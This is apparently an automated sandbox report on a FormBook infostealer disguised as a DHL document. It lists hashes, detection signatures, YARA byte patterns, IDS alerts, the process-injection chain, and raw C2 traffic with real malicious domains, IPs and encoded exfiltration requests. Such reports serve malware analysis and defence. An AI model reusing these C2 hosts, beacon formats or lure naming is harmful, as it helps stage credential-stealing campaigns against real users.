Windows Analysis Report
DHL 30312052024.exe

Overview

General Information

Sample name: DHL 30312052024.exe
Analysis ID: 1570258
MD5: e414a371a1be9843ba41ad3b33b1d734
SHA1: 9cea807095b000923036736217baabec3af1755e
SHA256: 80f9730a0f5124c24863e93b5e6b1b3dc653cc68c12055d9d7309fa636626ae8
Tags: DHL, exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DHL 30312052024.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\DHL 30312052024.exe" MD5: E414A371A1BE9843BA41AD3B33B1D734)
    • svchost.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\DHL 30312052024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FBboLdkGSWBoDSVHPM.exe (PID: 6624 cmdline: "C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7548 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • FBboLdkGSWBoDSVHPM.exe (PID: 4564 cmdline: "C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7840 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(5 of 11 entries shown)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 30312052024.exe, ParentProcessId: 7388, ParentProcessName: DHL 30312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ProcessId: 7472, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ParentImage: C:\Users\user\Desktop\DHL 30312052024.exe, ParentProcessId: 7388, ParentProcessName: DHL 30312052024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 30312052024.exe", ProcessId: 7472, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T17:43:39.116072+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49782 | 154.215.72.110 | 80 | TCP
2024-12-06T17:44:13.060877+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49865 | 116.50.37.244 | 80 | TCP
2024-12-06T17:45:36.259355+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49921 | 85.159.66.93 | 80 | TCP
2024-12-06T17:45:51.066808+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49986 | 91.195.240.94 | 80 | TCP
2024-12-06T17:46:14.625193+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49990 | 66.29.149.46 | 80 | TCP
2024-12-06T17:46:30.078407+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49994 | 195.110.124.133 | 80 | TCP
2024-12-06T17:47:01.525322+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49998 | 217.196.55.202 | 80 | TCP

AV Detection

Source: http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0 | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== | Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== | Avira URL Cloud: Label: malware
Source: DHL 30312052024.exe | ReversingLabs: Detection: 50%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL 30312052024.exe | Joe Sandbox ML: detected
Source: DHL 30312052024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3800818888.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000000.1605480285.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0061BAB0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00609480 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0060DD45 4x nop then pop edi
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02BF053E 4x nop then mov ebx, 00000004h

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49865 -> 116.50.37.244:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49782 -> 154.215.72.110:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49921 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49990 -> 66.29.149.46:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49998 -> 217.196.55.202:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49994 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49986 -> 91.195.240.94:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View | IP Address: 91.195.240.94
Source: Joe Sandbox View | IP Address: 154.215.72.110
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.goldenjade-travel.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.magmadokum.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.rssnewscast.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?LzY4r=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&F6=SVfTP6Q02ra8s0 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.techchains.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.elettrosistemista.zip | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.empowermedeco.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
Source: unknown | HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.goldenjade-travel.com | Origin: http://www.goldenjade-travel.com | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 194 | Referer: http://www.goldenjade-travel.com/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Data Raw: 4c 7a 59 34 72 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 79 59 69 4b 42 38 36 6c 7a 63 5a 6b 61 77 50 58 34 75 59 6e 62 56 47 42 5a 47 | Data Ascii: LzY4r=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 06 Dec 2024 16:43:38 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 